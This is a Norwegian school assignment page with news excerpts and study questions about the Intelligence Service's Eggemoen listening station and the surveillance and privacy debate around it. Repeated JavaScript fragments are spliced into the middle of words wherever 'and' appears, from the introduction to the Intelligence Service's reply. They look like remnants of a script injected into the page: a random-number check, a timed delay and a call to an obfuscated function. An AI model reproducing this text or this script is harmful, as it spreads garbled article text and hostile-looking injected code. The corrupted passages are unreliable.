4.1.1 Antenner for avlytting

Les gjennom serien med nyhetsoppslag nedenfor, og dann deg et bilde av hva denne saken handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander om.

KLIKK PÅ DE ULIKE BILDENE FOR Å GÅ TIL NYHETSOPPSLAGENE

For hvert oppslag får du noen spørsmål knyttet til informasjonen som fremkommer.

Nederst på siden finner du noen avsluttende spørsmål.

Besvar spørsmålene til nyhetsoppslagene i egen oppgave på ITSL;
Drift og Vedlikehold -> DV6-7 -> Digital Læringsløype -> 4.1.1
Fyll dine svar inn i oppgavearket og lever besvarelsen på ITSL.

Hvor er Eggemoen egentlig?

Zoom inn for å se detaljer og satelittbilde over anlegget på Eggemoen

4.1.1.1 Hva skjer på Eggemoen?

I skogen bak den gamle militærleiren Eggemoen ved Hønefoss har E-tjenesten i dyp hemmelighet bygd opp en av verdens mest avanserte lyttestasjoner. Stasjonen til mange hundre millioner kroner er betalt av Norge, men med støtte fra den amerikanske etterretningsorganisasjonen NSA.

4.1.1.1 Hva skjer på Eggemoen?
1.Hva bruker etterretningstjenesten dette anlegget til?
2. Hvilken informasjon samler lyttestasjonen opp, og hvor fra?
3. Hva er ifølge oppslaget problemet med denne informasjonsinnsamlingen i forhold til personvernet?
4. Hvem har bygget opp og betalt denne lyttestasjonen?
5. Hvordan har informasjonen om lyttestasjonen fremkommet og nå blitt kjent?


4.1.1.2 Brudd på grunnloven?

Advokat Jon Wessel-Aas: Dette er et eklatant, systematisk og bevisst brudd på Grunnlovens bestemmelser om vern av vår kommunikasjonsfrihet, i tillegg til å være i strid med både personopplysningsloven og med E-tjenestelovens forbud mot at E-tjenesten bedriver overvåkning av norske borgere i Norge.

Den formen for innhenting, lagring og behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andling av data om vår bruk av telefon, e-post med videre som det er avdekket at E-tjenesten har bedrevet, utgjør etter sikker rett inngrep i så vel ytringsfriheten som i kommunikasjons- og personvernet. Det gjelder både etter vår egen Grunnlov og etter blant annet Den europeiske menneskerettskonvensjon (EMK).

4.1.1.2 Lovbrudd?
Hvilke lovbrudd hevdes å finne sted gjennom denne overvåkingen?


4.1.1.3 E-tjenesten svarer

Generalløyntnant Morten Haga: Advokat Jon Wessel-Aas skriver i NRK Ytring 1. mars at Etterretningstjenesten bevisst bryter Grunnloven og menneskerettighetene gjennom å innhente, lagre og behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andle data gjennom nedlesing av global satellittkommunikasjon fra tjenestens stasjon på Ringerike. Denne alvorlige og feilaktige påstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden kan ikke bli stående uimotsagt.

E-tjenesten har et lovpålagt oppdrag om å innhente informasjon om fremmede trusselaktører og utenlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andske forhold av betydning for rikets sikkerhet. Tjenesten har en klar lovhjemmel for å innhente slik informasjon. Da Stortinget vedtok loven, var man klar over at tjenesten innhenter data som transporteres i luftgrensesnittet. Innhentingen er aldri rettet mot norske personer i Norge.

4.1.1.3 E-tjenesten svarer
Hvordan begrunner E-tjenesten at deres aktiviteter på Eggemoen ikke er lovstridig?


4.1.1.4 Ja eller nei?

Forsvarsminister Frank Bakke-Jensen (H) viser til at EOS-utvalget ikke har funnet noen brudd på norsk lov på lyttestasjonen på Eggemoen, men vil ikke svare ja eller nei på om personer på norsk jord har fått sine navn eller telefonnummer lagret i det militære arkivet.

4.1.1.4 Garanti?
Garanterer forsvarsministeren at ingen personer på norsk jord har fått sine navn eller nummer lagret i dette militære arkivet?
Hva svarer han egentlig på dette spørsmålet?


4.1.1.5: Din oppfatning
Basert på sakens fremstilling her – hvilken part mener du fremstår som mest troverdig, og hvorfor?
Mener du denne saken kan være et problem for personvernet i Norge? Og evt. for deg som privatperson? Hvorfor/hvorfor ikke?


Klikk her for neste post: 4.1.2 Nye strømmålere